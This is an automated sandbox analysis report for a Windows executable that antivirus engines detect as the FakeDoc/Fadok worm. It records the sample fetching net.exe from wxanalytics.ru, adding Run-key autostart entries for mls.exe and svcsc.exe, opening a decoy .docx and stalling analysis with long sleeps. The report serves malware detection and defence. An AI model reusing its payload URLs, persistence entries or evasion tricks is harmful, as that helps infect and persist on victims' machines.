7.0
高危

e4214e1d74ed5e5077f3ebd7531256c9c6a43473d39f3506ae11a5872a9533a5

dc4fc5826ca75b0847c9eb23786f3fce.exe

分析耗时

101s

最近分析

文件大小

2.6MB
静态报毒 动态报毒 100% AI SCORE=89 AIDETECTVM ATRAPS CLASSIC COBRA CONFIDENCE FADOK FAKD@5XDXI2 FAKEDOC FAOJIR GEN4 GENASA GENCIRC GENERICRXAH GENETIC HIDEDOC HIGH CONFIDENCE HLLW IFDX JFYA JWW@AGMSMWCK MALWARE1 PZJA R + TROJ R189010 RAZY RENDOC SCAR SCORE STATIC AI SUSPICIOUS PE TNER UNSAFE UVPM VWR6ENNJT6I WORMX ZEXAF ZUSY 更多
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
Alibaba Worm:Win32/FakeDoc.1d2864ba 20190527 0.3.0.5
Baidu Win32.Worm.FakeDoc.a 20190318 1.0.0.2
Tencent Malware.Win32.Gencirc.10b6abd3 20201209 1.0.0.1
Kingsoft 20201209 2017.9.26.565
McAfee GenericRXAH-AG!DC4FC5826CA7 20201209 6.0.6.653
CrowdStrike win/malicious_confidence_100% (W) 20190702 1.0
行为判定
动态指标
HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 个事件)
suspicious_features GET method with no useragent header suspicious_request GET http://wxanalytics.ru/net.exe.config
suspicious_features GET method with no useragent header suspicious_request GET http://wxanalytics.ru/net.exe
Performs some HTTP requests (2 个事件)
request GET http://wxanalytics.ru/net.exe.config
request GET http://wxanalytics.ru/net.exe
Resolves a suspicious Top Level Domain (TLD) (1 个事件)
domain wxanalytics.ru description Russian Federation domain TLD
Allocates read-write-execute memory (usually to unpack itself) (2 个事件)
Time & API Arguments Status Return Repeated
1621001761.098
NtAllocateVirtualMemory
process_identifier: 1424
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x0000000004070000
success 0 0
1621001694.723125
NtAllocateVirtualMemory
process_identifier: 192
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02830000
success 0 0
Checks whether any human activity is being performed by constantly checking whether the foreground window changed
A process attempted to delay the analysis task. (1 个事件)
description mls.exe tried to sleep 136 seconds, actually delayed analysis time by 136 seconds
Creates (office) documents on the filesystem (1 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\dc4fc5826ca75b0847c9eb23786f3fce.docx
A process created a hidden window (3 个事件)
Time & API Arguments Status Return Repeated
1620985521.342895
ShellExecuteExW
parameters:
filepath: dc4fc5826ca75b0847c9eb23786f3fce.docx
filepath_r: dc4fc5826ca75b0847c9eb23786f3fce.docx
show_type: 0
success 1 0
1620985521.608895
ShellExecuteExW
parameters: -s
filepath: C:\Users\Administrator.Oskar-PC\AppData\Roaming\RAC\mls.exe
filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Roaming\RAC\mls.exe
show_type: 0
success 1 0
1621001721.801625
ShellExecuteExW
parameters:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Roaming\RAC\svcsc.exe
filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Roaming\RAC\svcsc.exe
show_type: 0
failed 0 0
The binary likely contains encrypted or compressed data indicative of a packer (2 个事件)
entropy 7.119422995234983 section {'size_of_data': '0x001ca600', 'virtual_address': '0x000b7000', 'entropy': 7.119422995234983, 'name': '.rsrc', 'virtual_size': '0x001ca57c'} description A section with a high entropy has been found
entropy 0.7003437738731857 description Overall entropy of this PE file is high
Uses Windows utilities for basic Windows functionality (1 个事件)
cmdline C:\Users\Administrator.Oskar-PC\AppData\Roaming\RAC\svcsc.exe
网络通信
Communicates with host for which no DNS query was performed (1 个事件)
host 172.217.24.14
Installs itself for autorun at Windows startup (2 个事件)
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\mls reg_value "C:\Users\Administrator.Oskar-PC\AppData\Roaming\RAC\mls.exe" -s
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\svcsc.exe reg_value C:\Users\Administrator.Oskar-PC\AppData\Roaming\RAC\svcsc.exe
File has been identified by 63 AntiVirus engines on VirusTotal as malicious (50 out of 63 个事件)
Bkav W32.AIDetectVM.malware1
Elastic malicious (high confidence)
MicroWorld-eScan Gen:Variant.Ser.Zusy.2350
FireEye Generic.mg.dc4fc5826ca75b08
CAT-QuickHeal Worm.Fadok.A5
Qihoo-360 Win32/Virus.HideDoc.K
ALYac Gen:Variant.Ser.Zusy.2350
Cylance Unsafe
VIPRE Trojan.Win32.Generic.pak!cobra
Sangfor Malware
K7AntiVirus Trojan ( 004c3bbe1 )
Alibaba Worm:Win32/FakeDoc.1d2864ba
K7GW Trojan ( 004c3bbe1 )
Cybereason malicious.26ca75
Arcabit Trojan.Ser.Zusy.D92E
Baidu Win32.Worm.FakeDoc.a
Cyren W32/Fakedoc.PZJA-4253
Symantec SMG.Heur!gen
APEX Malicious
Paloalto generic.ml
ClamAV Win.Malware.Razy-6723913-0
Kaspersky Trojan.Win32.Agent.ifdx
BitDefender Gen:Variant.Ser.Zusy.2350
NANO-Antivirus Trojan.Win32.Rendoc.faojir
AegisLab Trojan.Win32.Agent.tnEr
Tencent Malware.Win32.Gencirc.10b6abd3
Ad-Aware Gen:Variant.Ser.Zusy.2350
Sophos Mal/Generic-R + Troj/FakeDoc-B
Comodo TrojWare.Win32.Scar.FAKD@5xdxi2
F-Secure Trojan.TR/ATRAPS.Gen4
DrWeb Win32.HLLW.Rendoc.3
Zillya Trojan.Scar.Win32.88546
TrendMicro WORM_FAKEDOC_FD050240.UVPM
McAfee-GW-Edition BehavesLike.Win32.Generic.vc
Emsisoft Worm.FakeDoc (A)
SentinelOne Static AI - Suspicious PE
Jiangmin Worm.Agent.ju
Avira TR/ATRAPS.Gen4
MAX malware (ai score=89)
Antiy-AVL Trojan/Win32.Scar.jfya
Gridinsoft Trojan.Win32.Agent.vb
Microsoft Worm:Win32/Fadok!rfn
ZoneAlarm Trojan.Win32.Agent.ifdx
GData Gen:Variant.Ser.Zusy.2350
Cynet Malicious (score: 100)
AhnLab-V3 Worm/Win32.Fadok.R189010
Acronis suspicious
McAfee GenericRXAH-AG!DC4FC5826CA7
VBA32 Trojan.Agent
Malwarebytes Trojan.FakeDoc
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

2015-02-13 02:50:20

Imports

Library KERNEL32.dll:
0x49403c ReleaseMutex
0x494040 FreeResource
0x494044 FindResourceW
0x494048 FreeLibrary
0x49404c LoadResource
0x494050 LoadLibraryExW
0x494054 SizeofResource
0x494058 LockResource
0x49405c EndUpdateResourceW
0x494064 UpdateResourceW
0x494068 ConnectNamedPipe
0x49406c CreateNamedPipeW
0x494070 GetLastError
0x494074 CreateThread
0x494078 FindFirstFileW
0x49407c PeekNamedPipe
0x494084 GetModuleFileNameW
0x494088 FindClose
0x49408c FindNextFileW
0x494090 SetFileAttributesW
0x494098 GetModuleHandleW
0x49409c WaitForSingleObject
0x4940a0 CreateMutexW
0x4940a4 DeleteFileW
0x4940a8 GetFileAttributesW
0x4940ac CopyFileW
0x4940b0 Sleep
0x4940b4 MoveFileExW
0x4940b8 GetTickCount
0x4940bc SetLastError
0x4940d0 VerSetConditionMask
0x4940d4 SleepEx
0x4940d8 VerifyVersionInfoA
0x4940dc FormatMessageA
0x4940e0 GetProcAddress
0x4940e8 GetFileType
0x4940ec GetStdHandle
0x4940f0 LoadLibraryA
0x4940f8 WideCharToMultiByte
0x494104 MultiByteToWideChar
0x494108 GetStringTypeW
0x49410c GetCurrentThreadId
0x494110 EncodePointer
0x494114 DecodePointer
0x494118 InterlockedExchange
0x49411c DuplicateHandle
0x494120 GetCurrentProcess
0x494124 GetCurrentThread
0x49412c GetCommandLineW
0x494130 HeapFree
0x494138 FindFirstFileExW
0x494140 HeapAlloc
0x494144 GetCPInfo
0x494148 IsDebuggerPresent
0x494150 GetDriveTypeW
0x494154 ExitThread
0x494158 SetFilePointerEx
0x494160 GetCurrentProcessId
0x494164 RaiseException
0x494168 RtlUnwind
0x494170 CreateTimerQueue
0x494178 TlsGetValue
0x494184 TerminateProcess
0x494188 TlsAlloc
0x49418c TlsSetValue
0x494190 TlsFree
0x494194 GetStartupInfoW
0x494198 CreateSemaphoreW
0x49419c GetDateFormatW
0x4941a0 GetTimeFormatW
0x4941a4 CompareStringW
0x4941a8 LCMapStringW
0x4941ac GetLocaleInfoW
0x4941b0 IsValidLocale
0x4941b4 GetUserDefaultLCID
0x4941b8 EnumSystemLocalesW
0x4941bc ExitProcess
0x4941c0 GetModuleHandleExW
0x4941c4 AreFileApisANSI
0x4941c8 GetProcessHeap
0x4941d8 HeapSize
0x4941dc FlushFileBuffers
0x4941e0 GetConsoleCP
0x4941e4 GetConsoleMode
0x4941e8 GetFullPathNameW
0x4941f0 IsValidCodePage
0x4941f4 GetACP
0x4941f8 GetOEMCP
0x494200 ReadConsoleW
0x494204 SetStdHandle
0x494214 OutputDebugStringW
0x494218 SwitchToThread
0x49421c GetThreadTimes
0x494224 GetModuleHandleA
0x494228 SetEvent
0x49422c CreateEventW
0x494230 SetThreadPriority
0x494234 GetVersionExW
0x494238 VirtualAlloc
0x49423c VirtualFree
0x494240 VirtualProtect
0x494244 ReleaseSemaphore
0x494248 InitializeSListHead
0x494258 QueryDepthSList
0x49425c UnregisterWaitEx
0x49426c LoadLibraryW
0x494270 WriteConsoleW
0x494274 SetEndOfFile
0x49427c GetThreadPriority
0x494280 UnregisterWait
0x494284 SignalObjectAndWait
0x494288 ReadFile
0x49428c SetFilePointer
0x494290 CloseHandle
0x494294 CreateFileW
0x494298 HeapReAlloc
0x49429c WriteFile
Library ADVAPI32.dll:
0x494000 CryptEncrypt
0x494004 CryptGetHashParam
0x494008 CryptDestroyKey
0x49400c CryptReleaseContext
0x494014 CryptImportKey
0x494018 CryptCreateHash
0x49401c CryptHashData
0x494020 CryptDestroyHash
0x494024 RegSetValueExW
0x494028 RegCloseKey
0x49402c RegOpenKeyExW
0x494030 RegOpenKeyW
0x494034 RegQueryValueExW
Library SHELL32.dll:
0x4942a8 ShellExecuteW
Library WS2_32.dll:
0x4942f4 socket
0x4942f8 WSAIoctl
0x4942fc getaddrinfo
0x494300 freeaddrinfo
0x494304 setsockopt
0x494308 sendto
0x49430c accept
0x494310 listen
0x494314 ioctlsocket
0x494318 gethostname
0x49431c ntohs
0x494320 htons
0x494324 getsockopt
0x494328 getsockname
0x49432c getpeername
0x494330 connect
0x494334 closesocket
0x494338 bind
0x49433c send
0x494340 recv
0x494344 WSASetLastError
0x494348 select
0x49434c __WSAFDIsSet
0x494350 WSAGetLastError
0x494354 WSACleanup
0x494358 WSAStartup
0x49435c recvfrom
Library WLDAP32.dll:
0x4942b0
0x4942b4
0x4942b8
0x4942bc
0x4942c0
0x4942c4
0x4942c8
0x4942cc
0x4942d0
0x4942d4
0x4942d8
0x4942dc
0x4942e0
0x4942e4
0x4942e8
0x4942ec

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49178 35.205.61.67 wxanalytics.ru 80
192.168.56.101 49183 35.205.61.67 wxanalytics.ru 80

UDP

Source Source Port Destination Destination Port
192.168.56.101 49235 114.114.114.114 53
192.168.56.101 50534 114.114.114.114 53
192.168.56.101 51808 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 57874 114.114.114.114 53
192.168.56.101 58367 114.114.114.114 53
192.168.56.101 65004 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 51378 224.0.0.252 5355
192.168.56.101 55368 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 60123 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 56540 239.255.255.250 3702
192.168.56.101 56807 239.255.255.250 1900
192.168.56.101 58368 239.255.255.250 3702
192.168.56.101 58707 239.255.255.250 3702

HTTP & HTTPS Requests

URI Data
http://wxanalytics.ru/net.exe.config
GET /net.exe.config HTTP/1.1
Host: wxanalytics.ru
Accept: */*

http://wxanalytics.ru/net.exe
GET /net.exe HTTP/1.1
Host: wxanalytics.ru
Accept: */*

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.